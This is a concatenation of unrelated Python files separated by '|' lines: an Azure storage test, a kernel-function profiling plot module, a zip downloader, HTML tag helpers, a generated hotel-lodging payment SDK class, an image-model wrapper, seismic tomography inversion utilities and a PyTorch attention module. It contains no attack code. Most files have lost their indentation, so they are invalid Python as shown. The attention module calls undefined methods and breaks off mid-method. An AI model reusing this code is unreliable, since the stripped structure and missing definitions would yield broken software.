import cmazure.storage.account
import cmazure.storage.common
import cmazure.common
from cmazure.credentials import AzureCredentials
def test_create():
creds = AzureCredentials.make_from_environment()
storage_client = cmazure.storage.common.make_storage_client(creds)
resource_client = cmazure.common.make_resource_client(creds)
resource_group = cmazure.common.create_resource_group(resource_client,
"test-resource-group",
"westus")
cmazure.storage.account.use_account(storage_client, resource_group, "brighttestaccount")
|
# SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2015, ARM Limited and contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Functions Analysis Module """
from trappy.utils import listify
from analysis_module import AnalysisModule
class FunctionsAnalysis(AnalysisModule):
"""
Support for kernel functions profiling and analysis
:param trace: input Trace object
:type trace: :mod:`libs.utils.Trace`
"""
def __init__(self, trace):
super(FunctionsAnalysis, self).__init__(trace)
def plotProfilingStats(self, functions=None, metrics='avg'):
"""
Plot functions profiling metrics for the specified kernel functions.
        For each specified metric a barplot is generated which reports the
        value of the metric when the kernel function has been executed on
        each CPU.
        By default all the kernel functions are plotted.
        :param functions: the name (or list of names) of kernel functions to plot
        :type functions: str or list(str)
        :param metrics: the metrics to plot
                        avg - average execution time
                        time - total execution time
        :type metrics: str or list(str)
"""
if not hasattr(self._trace, '_functions_stats_df'):
self._log.warning('Functions stats data not available')
return
metrics = listify(metrics)
df = self._trace.data_frame.functions_stats(functions)
        # Check that all the required metrics are actually available
available_metrics = df.columns.tolist()
if not set(metrics).issubset(set(available_metrics)):
msg = 'Metrics {} not supported, available metrics are {}'\
.format(set(metrics) - set(available_metrics),
available_metrics)
raise ValueError(msg)
for metric in metrics:
if metric.upper() == 'AVG':
title = 'Average Completion Time per CPUs'
ylabel = 'Completion Time [us]'
if metric.upper() == 'TIME':
title = 'Total Execution Time per CPUs'
ylabel = 'Execution Time [us]'
data = df[metric.lower()].unstack()
axes = data.plot(kind='bar',
figsize=(16, 8), legend=True,
title=title, table=True)
axes.set_ylabel(ylabel)
axes.get_xaxis().set_visible(False)
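# Usage sketch (assumption, not part of the original module): given a Trace
# object ``trace`` that carries functions-profiling data, the analysis above
# would typically be driven like this:
#
#     fa = FunctionsAnalysis(trace)
#     fa.plotProfilingStats(functions=['pick_next_task_fair', 'enqueue_task_fair'],
#                           metrics=['avg', 'time'])
#
# The function names are illustrative; any kernel functions present in the
# trace's functions_stats data frame can be passed.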
# vim :set tabstop=4 shiftwidth=4 expandtab
|
import zipfile
import io
import requests
def _get_zip(url):
"""Retrieve zipfile using http request.
zipfiles
Parameters
----------
url : type
Description of parameter `url`.
Returns
-------
zipfile.ZipFile
Usage:
>>> zip = _get_zip('https://www.bls.gov/oes/special.requests/oesm17nat.zip')
>>> type(zip)
<class 'zipfile.ZipFile'>
>>> for file in zip.filelist:
... print(file.filename)
...
oesm17nat/field_descriptions.xlsx
oesm17nat/national_M2017_dl.xlsx
# accessing zipfile obects for i/o operations
>>> fp = zip.open('oesm17nat/field_descriptions.xlsx', 'r')
>>> fp.readable()
True
fp.close()
"""
try:
r = requests.get(url)
if r.ok:
return zipfile.ZipFile(io.BytesIO(r.content))
else:
            raise requests.exceptions.HTTPError('Not a valid request. '
                                                'Double check for valid parameters.')
except requests.exceptions.ConnectionError as e:
print(e, '\nFailed to establish a new connection. Check internet.')
def get_file(url, filename):
try:
zip = _get_zip(url)
fp = zip.open(filename, 'r')
return fp
except Exception as e:
print(e)
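if __name__ == '__main__':
    # Minimal demo (assumption, not part of the original module): fetch the BLS
    # archive used in the docstring above and open one file from it.
    bls_url = 'https://www.bls.gov/oes/special.requests/oesm17nat.zip'
    fp = get_file(bls_url, 'oesm17nat/field_descriptions.xlsx')
    if fp is not None:
        print('readable:', fp.readable())
        fp.close()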
|
# import asyncio
import logging
import pathlib
# import re
# import httpx
logger = logging.getLogger(__name__)
class Tag:
@staticmethod
def tag(tag, content, **attrs):
attr_line = ''.join(f' {attr}="{v}"' for attr, v in attrs.items())
return f'<{tag}{attr_line}>{content}</{tag}>'
@staticmethod
def font(content, color):
return Tag.tag('font', content, color=color)
@staticmethod
def grey(content):
return Tag.font(content, 'lightgrey')
def should_update(src_path: pathlib.Path, dst_path: pathlib.Path):
if dst_path.exists() and src_path.stat().st_mtime <= dst_path.stat().st_mtime:
return False
return True
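if __name__ == '__main__':
    # Small self-check (not part of the original module): exercise the HTML tag
    # helpers and the mtime comparison helper.
    print(Tag.tag('a', 'docs', href='https://example.com'))
    # -> <a href="https://example.com">docs</a>
    print(Tag.grey('muted text'))
    # -> <font color="lightgrey">muted text</font>
    # the destination file does not exist, so an update is reported as needed
    print(should_update(pathlib.Path(__file__), pathlib.Path('nonexistent.html')))  # True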
################################################################################
# TODO: WIP, doesn't work now
# https://www.twilio.com/blog/asynchronous-http-requests-in-python-with-httpx-and-asyncio
# def gather_urls(path) -> list[str]:
# urls = []
# with open(path, encoding='utf8') as reader:
# for line in reader:
# for match in re.finditer(r'\[.*?\]\((.*?)\)', line):
# # TODO: make it safe since there can be `()` in the url
# url_desc = match.group(1)
# if not url_desc.startswith('http'):
# logger.warning(
# f"{url_desc} doesn't start with http: {line} {path.name}")
# continue
# urls.append(re.sub(r' ".*?"', '', url_desc))
# return urls
#
#
# # TODO: still full of errors
# # white_list = [
# # 'wikipedia.org',
# # 'https://github.com',
# # 'https://www.youtube.com',
# # 'https://shiina18.github.io'
# # ]
#
#
# async def is_url_alive(client, url, posts):
# log = f' : {url} {posts}'
# # TODO: VPN can not be used now
# # for s in white_list:
# # if s in url:
# # return
# try:
# headers = {
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'
# }
# await client.head(url, headers=headers)
# # TODO: check status code
# logger.debug('ok' + log)
# except httpx.ConnectTimeout as exc:
# logger.error(type(exc).__name__ + log)
# except (httpx.RemoteProtocolError, httpx.ReadTimeout) as exc:
# logger.debug(type(exc).__name__ + log)
# except httpx.HTTPError as exc:
# logger.error(type(exc).__name__ + log)
#
#
# async def check_urls(url_posts_dict: dict[str, list[str]]):
# # https://www.python-httpx.org/advanced/#pool-limit-configuration
# limits = httpx.Limits(max_connections=None)
# async with httpx.AsyncClient(limits=limits) as client:
# tasks = [
# asyncio.ensure_future(is_url_alive(client, url, posts))
# for url, posts in url_posts_dict.items()
# ]
# await asyncio.gather(*tasks)
################################################################################
|
# -*- coding: utf-8 -*-
#
# This class was auto-generated from the API references found at
# https://epayments-api.developer-ingenico.com/s2sapi/v1/
#
from ingenico.connect.sdk.data_object import DataObject
from ingenico.connect.sdk.domain.definitions.lodging_charge import LodgingCharge
from ingenico.connect.sdk.domain.definitions.lodging_room import LodgingRoom
class LodgingData(DataObject):
"""
| Object that holds lodging specific data
"""
__charges = None
__check_in_date = None
__check_out_date = None
__folio_number = None
__is_confirmed_reservation = None
__is_facility_fire_safety_conform = None
__is_no_show = None
__is_preference_smoking_room = None
__number_of_adults = None
__number_of_nights = None
__number_of_rooms = None
__program_code = None
__property_customer_service_phone_number = None
__property_phone_number = None
__renter_name = None
__rooms = None
@property
def charges(self):
"""
| Object that holds lodging related charges
Type: list[:class:`ingenico.connect.sdk.domain.definitions.lodging_charge.LodgingCharge`]
"""
return self.__charges
@charges.setter
def charges(self, value):
self.__charges = value
@property
def check_in_date(self):
"""
| The date the guest checks into (or plans to check in to) the facility.
| Format: YYYYMMDD
Type: str
"""
return self.__check_in_date
@check_in_date.setter
def check_in_date(self, value):
self.__check_in_date = value
@property
def check_out_date(self):
"""
| The date the guest checks out of (or plans to check out of) the facility.
| Format: YYYYMMDD
Type: str
"""
return self.__check_out_date
@check_out_date.setter
def check_out_date(self, value):
self.__check_out_date = value
@property
def folio_number(self):
"""
| The Lodging Folio Number assigned to the itemized statement of charges and credits associated with this lodging stay, which can be any combination of characters and numerals defined by the Merchant or authorized Third Party Processor.
Type: str
"""
return self.__folio_number
@folio_number.setter
def folio_number(self, value):
self.__folio_number = value
@property
def is_confirmed_reservation(self):
"""
| Indicates whether the room reservation is confirmed.
* true - The room reservation is confirmed
* false - The room reservation is not confirmed
Type: bool
"""
return self.__is_confirmed_reservation
@is_confirmed_reservation.setter
def is_confirmed_reservation(self, value):
self.__is_confirmed_reservation = value
@property
def is_facility_fire_safety_conform(self):
"""
| Defines whether or not the facility conforms to the requirements of the Hotel and Motel Fire Safety Act of 1990, or similar legislation.
* true - The facility conform to the requirements
* false - The facility doesn't conform to the requirements
Type: bool
"""
return self.__is_facility_fire_safety_conform
@is_facility_fire_safety_conform.setter
def is_facility_fire_safety_conform(self, value):
self.__is_facility_fire_safety_conform = value
@property
def is_no_show(self):
"""
        | Indicates whether the customer is a no-show. In that case, the lodging property can charge a no-show fee.
* true - The customer is a no show
* false - Not applicable
Type: bool
"""
return self.__is_no_show
@is_no_show.setter
def is_no_show(self, value):
self.__is_no_show = value
@property
def is_preference_smoking_room(self):
"""
        | Indicates the preference of the customer for a smoking or non-smoking room.
* true - A smoking room is preferred
* false - A non-smoking room is preferred
Type: bool
"""
return self.__is_preference_smoking_room
@is_preference_smoking_room.setter
def is_preference_smoking_room(self, value):
self.__is_preference_smoking_room = value
@property
def number_of_adults(self):
"""
| The total number of adult guests staying (or planning to stay) at the facility (i.e., all booked rooms)
Type: int
"""
return self.__number_of_adults
@number_of_adults.setter
def number_of_adults(self, value):
self.__number_of_adults = value
@property
def number_of_nights(self):
"""
| The number of nights for the lodging stay
Type: int
"""
return self.__number_of_nights
@number_of_nights.setter
def number_of_nights(self, value):
self.__number_of_nights = value
@property
def number_of_rooms(self):
"""
| The number of rooms rented for the lodging stay
Type: int
"""
return self.__number_of_rooms
@number_of_rooms.setter
def number_of_rooms(self, value):
self.__number_of_rooms = value
@property
def program_code(self):
"""
| Code that corresponds to the category of lodging charges detailed in this message.Allowed values:
* lodging - (Default) Submitted charges are for lodging
        * noShow - Submitted charges are for the failure of the guest(s) to check in for a reserved room
* advancedDeposit - Submitted charges are for an Advanced Deposit to reserve one or more rooms
| If no value is submitted the default value lodging is used.
Type: str
"""
return self.__program_code
@program_code.setter
def program_code(self, value):
self.__program_code = value
@property
def property_customer_service_phone_number(self):
"""
| The international customer service phone number of the facility
Type: str
"""
return self.__property_customer_service_phone_number
@property_customer_service_phone_number.setter
def property_customer_service_phone_number(self, value):
self.__property_customer_service_phone_number = value
@property
def property_phone_number(self):
"""
| The local phone number of the facility in an international phone number format
Type: str
"""
return self.__property_phone_number
@property_phone_number.setter
def property_phone_number(self, value):
self.__property_phone_number = value
@property
def renter_name(self):
"""
| Name of the person or business entity charged for the reservation and/or lodging stay
Type: str
"""
return self.__renter_name
@renter_name.setter
def renter_name(self, value):
self.__renter_name = value
@property
def rooms(self):
"""
| Object that holds lodging related room data
Type: list[:class:`ingenico.connect.sdk.domain.definitions.lodging_room.LodgingRoom`]
"""
return self.__rooms
@rooms.setter
def rooms(self, value):
self.__rooms = value
def to_dictionary(self):
dictionary = super(LodgingData, self).to_dictionary()
if self.charges is not None:
dictionary['charges'] = []
for element in self.charges:
if element is not None:
dictionary['charges'].append(element.to_dictionary())
if self.check_in_date is not None:
dictionary['checkInDate'] = self.check_in_date
if self.check_out_date is not None:
dictionary['checkOutDate'] = self.check_out_date
if self.folio_number is not None:
dictionary['folioNumber'] = self.folio_number
if self.is_confirmed_reservation is not None:
dictionary['isConfirmedReservation'] = self.is_confirmed_reservation
if self.is_facility_fire_safety_conform is not None:
dictionary['isFacilityFireSafetyConform'] = self.is_facility_fire_safety_conform
if self.is_no_show is not None:
dictionary['isNoShow'] = self.is_no_show
if self.is_preference_smoking_room is not None:
dictionary['isPreferenceSmokingRoom'] = self.is_preference_smoking_room
if self.number_of_adults is not None:
dictionary['numberOfAdults'] = self.number_of_adults
if self.number_of_nights is not None:
dictionary['numberOfNights'] = self.number_of_nights
if self.number_of_rooms is not None:
dictionary['numberOfRooms'] = self.number_of_rooms
if self.program_code is not None:
dictionary['programCode'] = self.program_code
if self.property_customer_service_phone_number is not None:
dictionary['propertyCustomerServicePhoneNumber'] = self.property_customer_service_phone_number
if self.property_phone_number is not None:
dictionary['propertyPhoneNumber'] = self.property_phone_number
if self.renter_name is not None:
dictionary['renterName'] = self.renter_name
if self.rooms is not None:
dictionary['rooms'] = []
for element in self.rooms:
if element is not None:
dictionary['rooms'].append(element.to_dictionary())
return dictionary
def from_dictionary(self, dictionary):
super(LodgingData, self).from_dictionary(dictionary)
if 'charges' in dictionary:
if not isinstance(dictionary['charges'], list):
raise TypeError('value \'{}\' is not a list'.format(dictionary['charges']))
self.charges = []
for element in dictionary['charges']:
value = LodgingCharge()
self.charges.append(value.from_dictionary(element))
if 'checkInDate' in dictionary:
self.check_in_date = dictionary['checkInDate']
if 'checkOutDate' in dictionary:
self.check_out_date = dictionary['checkOutDate']
if 'folioNumber' in dictionary:
self.folio_number = dictionary['folioNumber']
if 'isConfirmedReservation' in dictionary:
self.is_confirmed_reservation = dictionary['isConfirmedReservation']
if 'isFacilityFireSafetyConform' in dictionary:
self.is_facility_fire_safety_conform = dictionary['isFacilityFireSafetyConform']
if 'isNoShow' in dictionary:
self.is_no_show = dictionary['isNoShow']
if 'isPreferenceSmokingRoom' in dictionary:
self.is_preference_smoking_room = dictionary['isPreferenceSmokingRoom']
if 'numberOfAdults' in dictionary:
self.number_of_adults = dictionary['numberOfAdults']
if 'numberOfNights' in dictionary:
self.number_of_nights = dictionary['numberOfNights']
if 'numberOfRooms' in dictionary:
self.number_of_rooms = dictionary['numberOfRooms']
if 'programCode' in dictionary:
self.program_code = dictionary['programCode']
if 'propertyCustomerServicePhoneNumber' in dictionary:
self.property_customer_service_phone_number = dictionary['propertyCustomerServicePhoneNumber']
if 'propertyPhoneNumber' in dictionary:
self.property_phone_number = dictionary['propertyPhoneNumber']
if 'renterName' in dictionary:
self.renter_name = dictionary['renterName']
if 'rooms' in dictionary:
if not isinstance(dictionary['rooms'], list):
raise TypeError('value \'{}\' is not a list'.format(dictionary['rooms']))
self.rooms = []
for element in dictionary['rooms']:
value = LodgingRoom()
self.rooms.append(value.from_dictionary(element))
return self
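if __name__ == '__main__':
    # Round-trip sketch (not part of the generated SDK file): the dictionary
    # produced by to_dictionary() uses the API's camelCase keys and can be fed
    # straight back into from_dictionary(). Values here are illustrative.
    lodging = LodgingData()
    lodging.check_in_date = '20240101'
    lodging.check_out_date = '20240105'
    lodging.number_of_nights = 4
    as_dict = lodging.to_dictionary()
    print(as_dict)
    restored = LodgingData().from_dictionary(as_dict)
    print(restored.number_of_nights)  # 4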
|
import os
os.environ['TF_KERAS'] = '1'
import numpy as np
from skimage.filters import gaussian
if os.environ.get('TF_KERAS'):
from classification_models.tfkeras import Classifiers
class DummyModel:
def __init__(self):
pass
def predict(self, image: np.ndarray, sigma: float = 3.0) -> np.ndarray:
return gaussian(image, sigma=sigma, preserve_range=True)
class ImageNetModel:
def __init__(self):
self.pretrainedModel, self.preprocess_input = Classifiers.get('resnet18')
def predict(self, image: np.ndarray) -> np.ndarray:
model = self.pretrainedModel(
input_shape=(224, 224, 3), weights="imagenet", classes=1000
)
image = self.preprocess_input(image)
image = np.expand_dims(image, 0)
y = model.predict(image)
return y
if __name__ == "__main__":
pass
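    # Minimal demo (assumption, not part of the original file): DummyModel only
    # applies a Gaussian blur, so a random array is enough to exercise it.
    demo_image = np.random.rand(64, 64)
    blurred = DummyModel().predict(demo_image, sigma=2.0)
    print(demo_image.shape == blurred.shape)  # True, gaussian() preserves shape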
|
# -*- coding: utf-8 -*-
"""
Utilities for ROSES 2021
Adapted from (https://github.com/bgoutorbe/seismic-noise-tomography)
"""
import numpy as np
import itertools as it
import scipy
import pygmt
import xarray as xr
from . import psutils
from .pstomo import Grid
def make_G(paths, grid, v0):
"""
Makes the matrix G for a given set of paths:
"""
G = np.zeros((len(paths), grid.n_nodes()))
for ipath, path in enumerate(paths):
lon_M, lat_M = path[:, 0], path[:, 1]
xyzM = psutils.geo2cartesian(lon_M, lat_M)
iA, iB, iC = grid.indexes_delaunay_triangle(lon_M, lat_M)
lonlatA, lonlatB, lonlatC = [grid.xy(index_) for index_ in (iA, iB, iC)]
xyzA, xyzB, xyzC = [psutils.geo2cartesian(lon, lat)
for lon, lat in (lonlatA, lonlatB, lonlatC)]
xyzMp = psutils.projection(xyzM, xyzA, xyzB, xyzC)
wA, wB, wC = psutils.barycentric_coords(xyzMp, xyzA, xyzB, xyzC)
# attributing weights to grid nodes along path:
# w[j, :] = w_j(r) = weights of node j along path
nM = path.shape[0]
w = np.zeros((grid.n_nodes(), nM))
w[iA, range(nM)] = wA
w[iB, range(nM)] = wB
w[iC, range(nM)] = wC
# ds = array of infinitesimal distances along path
ds = psutils.dist(lons1=lon_M[:-1], lats1=lat_M[:-1],
lons2=lon_M[1:], lats2=lat_M[1:])
# integrating w_j(r) / v0 along path using trapeze formula
G[ipath, :] = np.sum(0.5 * (w[:, :-1] + w[:, 1:]) / v0 * ds, axis=-1)
G = np.matrix(G)
return G
def checkerboard_func(grid, vmid, vmin, vmax, squaresize, shape='cos'):
"""
Returns a checkerboard function, f(lons, lats), whose background
value is *vmid*, and alternating min/max values are *vmin* and
*vmax*. The centers of the anomalies are separated by *squaresize*
(in km), and their shape is either 'gaussian' or 'cos'.
@rtype: function
"""
# converting square size from km to degrees
d2rad = np.pi / 180.0
midlat = 0.5 * (grid.ymin + grid.get_ymax())
latwidth = squaresize / 6371.0 / d2rad
lonwidth = squaresize / (6371.0 * np.cos(midlat * d2rad)) / d2rad
# Basis function defining an anomaly of
# unit height centered at (*lon0*, *lat0*).
if shape.lower().strip() == 'gaussian':
def basis_func(lons, lats, lon0, lat0):
"""
            Gaussian anomaly, with sigma parameter such that 3 sigma
is the distance between the center and the border of
the square, that is, half the distance between 2
centers.
"""
n = len(lons)
r = psutils.dist(lons1=lons, lats1=lats, lons2=n*[lon0], lats2=n*[lat0])
sigma = squaresize / 6.0
return np.exp(- r**2 / (2 * sigma**2))
elif shape.lower().strip() == 'cos':
def basis_func(lons, lats, lon0, lat0):
"""
            Cosine anomaly
"""
x = (lons - lon0) / lonwidth
y = (lats - lat0) / latwidth
outside_square = (np.abs(x) >= 0.5) | (np.abs(y) >= 0.5)
return np.where(outside_square, 0.0, np.cos(np.pi*x) * np.cos(np.pi*y))
else:
raise Exception("Unknown shape anomaly: " + shape)
# coordinates of the center of the anomalies
startlon = grid.xmin + lonwidth / 2.0
stoplon = grid.get_xmax() + lonwidth
centerlons = list(np.arange(startlon, stoplon, lonwidth))
startlat = grid.ymin + latwidth / 2.0
stoplat = grid.get_ymax() + latwidth
centerlats = list(np.arange(startlat, stoplat, latwidth))
centerlonlats = list(it.product(centerlons, centerlats))
# factors by which multiply the basis function associated
# with each center (to alternate lows and highs)
polarities = [(centerlons.index(lon) + centerlats.index(lat)) % 2
for lon, lat in centerlonlats]
factors = np.where(np.array(polarities) == 1, vmax - vmid, vmin - vmid)
def func(lons, lats):
"""
        Checkerboard function: sum of the basis functions along
the centers defined above, times the high/low factor,
plus background velocity.
"""
lowhighs = [f * basis_func(lons, lats, lon0, lat0) for f, (lon0, lat0)
in zip(factors, centerlonlats)]
return vmid + sum(lowhighs)
return func
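# Usage sketch (assumption, not part of the original module): the returned
# function is evaluated on node coordinates, e.g. to build a synthetic model
# for a checkerboard resolution test. The velocities and square size below
# are illustrative only:
#
#     ck = checkerboard_func(grid, vmid=3.0, vmin=2.8, vmax=3.2,
#                            squaresize=200, shape='cos')
#     lons, lats = grid.xy_nodes()
#     v_synthetic = ck(lons, lats)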
def path_density(grid, paths, window):
"""
Returns the path density, that is, on each node of the
grid, the number of paths that cross the rectangular
cell of size (window[0], window[1]) centered on
the node.
"""
# initializing path density
density = np.zeros(grid.n_nodes())
# coordinates of grid nodes and associated windows
lons_nodes, lats_nodes = grid.xy_nodes()
lons_min = np.expand_dims(lons_nodes - window[0] / 2.0, axis=-1)
lons_max = np.expand_dims(lons_nodes + window[0] / 2.0, axis=-1)
lats_min = np.expand_dims(lats_nodes - window[1] / 2.0, axis=-1)
lats_max = np.expand_dims(lats_nodes + window[1] / 2.0, axis=-1)
for path in paths:
lons_path, lats_path = path[:, 0], path[:, 1]
# are points of paths in windows?
# 1st dim = grid nodes; 2nd dim = points along path
points_in_windows = (lons_path >= lons_min) & (lons_path <= lons_max) & \
(lats_path >= lats_min) & (lats_path <= lats_max)
density += np.any(points_in_windows, axis=-1)
return density
def invert4model(alpha, beta, lambda_, correlation_length, lonstep, latstep,
grid, vels, dists, paths):
"""
A function to wrap all the calculations when inverting for the tomographic
model.
Parameters:
-----------
alpha: float
The smoothing parameter for the inversion.
beta: float
The strength of the weighted norm penalization term in the penalty
function
    lambda_: float
        Controls how quickly the norm penalization is relaxed with
        increasing path density (see the diagonal term of Q below).
    correlation_length: float
        Correlation length of the Gaussian smoothing kernel.
    Returns:
    --------
    v, path_density, R, grid, Cinv, Ginv
        The 2-D velocity model, the path density map, the resolution
        matrix, the inversion grid, the inverse data covariance matrix
        and the generalized inverse.
"""
s = (dists / vels).sum() / dists.sum()
v0 = 1.0 / s
G = make_G(paths, grid, v0)
dobs = np.matrix(dists / vels - dists / v0).T
density = path_density(grid, paths, window=(lonstep, latstep))
sigmav = np.ones((len(vels))) * 0.3
sigmad = sigmav * dists / vels**2
Cinv = np.matrix(np.zeros((len(sigmav), len(sigmav))))
np.fill_diagonal(Cinv, 1.0 / sigmad**2)
twoD_path_density = grid.to_2D_array(density)
dists_mat = np.zeros((grid.n_nodes(), grid.n_nodes()))
i_upper, j_upper = np.triu_indices_from(dists_mat)
lons_i, lats_i = grid.xy(i_upper)
lons_j, lats_j = grid.xy(j_upper)
dists_mat[i_upper, j_upper] = psutils.dist(lons1=lons_i, lats1=lats_i,
lons2=lons_j, lats2=lats_j)
dists_mat += dists_mat.T
# Calculate the smoothing kernel
S = np.exp(- dists_mat**2 / (2 * correlation_length**2))
S /= S.sum(axis=-1) - np.diag(S) # normalization of non-diagonal terms
# setting up spatial regularization matrix F
F = np.matrix(-S)
F[np.diag_indices_from(F)] = 1
F *= alpha
# Calculate regularization matrix Q
# ----------------------------------------------------------------------- #
Q = F.T * F
for i, pd in enumerate(density):
Q[i, i] += beta ** 2 * np.exp(-2 * lambda_ * pd)
# ----------------------------------------------------------------------- #
covmopt = np.linalg.inv(G.T * Cinv * G + Q)
Ginv = covmopt * G.T # Calculate the generalized inverse
mopt = Ginv * Cinv * dobs
R = Ginv * Cinv * G
v = grid.to_2D_array(v0 / (1 + mopt))
return v, twoD_path_density, R, grid, Cinv, Ginv
def make_paths(disp_curves, v_type):
# Here I am just appending to a list. This is not necessarily fast, but
# I'm only appending a few values so it's ok here. Usually it's better to
# predefine the array.
paths = []
dists = []
for idx, row in disp_curves.iterrows():
dist = psutils.dist(row.source_lon, row.source_lat,
row.receiver_lon, row.receiver_lat)
npts = np.max([np.ceil(dist) + 1, 100])
source_coords = (row.source_lon, row.source_lat)
receiver_coords = (row.receiver_lon, row.receiver_lat)
path = psutils.geodesic(source_coords, receiver_coords, npts)
paths.append(path)
dists.append(dist)
dists = np.array(dists)
paths = np.array(paths, dtype="object")
vels = disp_curves[v_type]
return vels, paths, dists
def make_grid(disp_curves, tol, latstep, lonstep):
"""
Set up the inversion grid.
"""
# Get the smallest longitude
min_rcv_lon = np.min(disp_curves["receiver_lon"])
min_src_lon = np.min(disp_curves["source_lon"])
min_lon = np.min([min_rcv_lon, min_src_lon]) - tol
# Get the smallest latitude
min_rcv_lat = np.min(disp_curves["receiver_lat"])
min_src_lat = np.min(disp_curves["source_lat"])
min_lat = np.min([min_rcv_lat, min_src_lat]) - tol
# Get the largest longitude
max_rcv_lon = np.max(disp_curves["receiver_lon"])
max_src_lon = np.max(disp_curves["source_lon"])
max_lon = np.max([max_rcv_lon, max_src_lon])
# Get the largest latitude
max_rcv_lat = np.max(disp_curves["receiver_lat"])
max_src_lat = np.max(disp_curves["source_lat"])
max_lat = np.max([max_rcv_lat, max_src_lat])
nlon = np.ceil((max_lon + tol - min_lon) / lonstep)
nlat = np.ceil((max_lat + tol - min_lat) / latstep)
# Create a grid object, from pysismo
grid = Grid(min_lon, lonstep, nlon, min_lat, latstep, nlat)
return grid
def plot_interpolated(grid, v, fine_num_lats, fine_num_lons, path_density, inset_region,
v_type):
xmin, xmax, ymin, ymax = grid.bbox()
# Interpolate the data onto a finer grid
# --------------------------------------------------------------------------------------------------------------- #
lats = np.linspace(ymin, ymax, fine_num_lats)
lons = np.linspace(xmin, xmax, fine_num_lons)
x = np.digitize(lats, grid.yarray(), right=True)
y = np.digitize(lons, grid.xarray(), right=True)
fv = scipy.interpolate.interp2d(grid.yarray(), grid.xarray(), v, kind="cubic")
v_interp = fv(lats, lons)
# ----------------------------------------------------------------------- #
# Mask areas with no raypaths
# ----------------------------------------------------------------------- #
for i in range(len(x)):
for j in range(len(y)):
dens = path_density[y[j], x[i]]
if dens < 1.0:
v_interp[j, i] = v_interp[j, i] * np.nan
# ----------------------------------------------------------------------- #
grd = xr.DataArray(v_interp.T, coords=(lats, lons)) # Get the data in a format that pygmt can use
fig = pygmt.Figure()
fig.basemap(
region=f"{xmin-1}/{xmax+1}/{ymin-1}/{ymax+1}", # Plot a slightly expanded region around the study area
frame=True, # Plot a nice frame
projection="M15c" # Use Mercator projection with a plot width of 15cm
)
fig.coast(
land="lightgray", # Color the land light gray
water="white", # color the water white
borders=1, # Plot national boundaries
shorelines=True # Show shorelines
)
# Make a colormap
pygmt.makecpt(
cmap="inferno", reverse=True,
series=[np.nanmin(v_interp), np.nanmax(v_interp)]
)
# Show the tomography data
fig.grdimage(
grd,
frame=True,
cmap=True,
nan_transparent=True,
transparency=20
)
# Make an inset plot, with the study area depicted
with fig.inset(position="jTL+w5c/4.8c", box="+gblack+p2p"):
fig.coast(
region=inset_region,
land="green",
water="cornflowerblue"
)
rectangle=[[xmin-1, ymin-1, xmax+1,ymax+1]]
fig.plot(data=rectangle, style="r+s", pen="2p,blue")
fig.colorbar(frame=f'+l"{v_type} [km/s]"')
fig.show()
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class Attention(nn.Module):
def __init__(self):
super(Attention, self).__init__()
self.L = 500
self.D = 128
self.embeddingDimension = 120
self.K = 1
self.attention = nn.Sequential(
nn.Linear(self.L, self.D),
nn.Tanh(),
nn.Linear(self.D, self.K)
)
self.classifier = nn.Sequential(
nn.Linear(self.L*self.K, 1),
nn.Sigmoid()
)
#this is a trial attempt at building a feature extractor for the optical flow from i3d
# input dimension will be (7,7,1024) or (m,7,7,1024) maybe?
#output will be a 120 dimension vector for now
def feature_extractor_opticalflow_i3d(self, opticalFlow, ifPool=False):
#reshaping the opticalFlow, so that it is in channel-first order (m,1024,7,7)
opticalFlow = opticalFlow.permute(0,3,1,2)
if ifPool==True:
opticalFlow = nn.MaxPool2d(kernel_size=3, stride=1)(opticalFlow)
opticalFlow = nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3,stride=1)(opticalFlow)
opticalFlow = nn.ReLU()(opticalFlow)
opticalFlow = nn.Conv2d(in_channels=512, out_channels=256, kernel_size=1, stride=1)(opticalFlow)
opticalFlow = nn.ReLU()(opticalFlow)
else:
opticalFlow = nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3, stride=1)(opticalFlow)
opticalFlow = nn.ReLU()(opticalFlow)
opticalFlow = nn.Conv2d(in_channels=512, out_channels=256, kernel_size=3, stride=1)(opticalFlow)
opticalFlow = nn.ReLU()(opticalFlow)
opticalFlow = nn.Conv2d(in_channels=256, out_channels=64, kernel_size=1)(opticalFlow)
opticalFlow = nn.ReLU()(opticalFlow)
opticalFlow = opticalFlow.reshape(-1, 64*3*3)
        opticalFlow = nn.Linear(in_features=64*3*3, out_features=self.embeddingDimension)(opticalFlow)
opticalFlow = nn.ReLU()(opticalFlow)
return opticalFlow
#this is a trial attempt at building a feature extractor for the rgb output from i3d
# input dimension will be (7,7,1024) or (m,7,7,1024) maybe?
#output will be a 120 dimension vector for now
def feature_extractor_rgb_i3d(self, rgb, ifPool=False):
#reshaping the rgb input, so that it is in channel-first order (m,1024,7,7)
rgb = rgb.permute(0,3,1,2)
if ifPool==True:
rgb = nn.MaxPool2d(kernel_size=3, stride=1)(rgb)
rgb = nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3,stride=1)(rgb)
rgb = nn.ReLU()(rgb)
rgb = nn.Conv2d(in_channels=512, out_channels=256, kernel_size=1, stride=1)(rgb)
rgb = nn.ReLU()(rgb)
else:
rgb = nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3, stride=1)(rgb)
rgb = nn.ReLU()(rgb)
rgb = nn.Conv2d(in_channels=512, out_channels=256, kernel_size=3, stride=1)(rgb)
rgb = nn.ReLU()(rgb)
rgb = nn.Conv2d(in_channels=256, out_channels=64, kernel_size=1)(rgb)
rgb = nn.ReLU()(rgb)
rgb = rgb.reshape(-1, 64*3*3)
        rgb = nn.Linear(in_features=64*3*3, out_features=self.embeddingDimension)(rgb)
rgb = nn.ReLU()(rgb)
return rgb
def forward(self, x):
x = x.squeeze(0)
H = self.feature_extractor_part1(x)
H = H.view(-1, 50 * 4 * 4)
H = self.feature_extractor_part2(H) # NxL
A = self.attention(H) # NxK
A = torch.transpose(A, 1, 0) # KxN
A = F.softmax(A, dim=1) # softmax over N
M = torch.mm(A, H) # KxL
Y_prob = self.classifier(M)
